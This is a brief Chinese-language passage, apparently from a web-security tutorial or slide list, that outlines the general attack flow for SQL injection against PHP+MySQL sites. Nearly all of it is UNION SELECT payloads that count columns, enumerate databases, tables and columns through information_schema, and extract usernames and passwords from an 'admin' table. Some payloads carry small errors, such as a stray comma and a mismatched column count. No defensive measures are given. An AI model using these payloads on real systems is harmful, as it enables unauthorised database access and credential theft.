4. SQL 注入攻击不防范
PHP+MYSQL注入的一般攻击流程
半分法猜解字段数量
order by 3
生成union查询语句
and 0 union select 1,2,3
获取数据库
and 0 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA
获取表名
and 0 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA = 0x00
获取字段名
and 0 union select 1,COLUMN_NAME,3, from information_schema.COLUMNS where TABLE_NAME
=0x00
接下来?假设猜解出来的表名为admin字段分别为username和password
and 0 union select 1,username,password,3,4,5,6 from admin
4 http://www.tech-club.org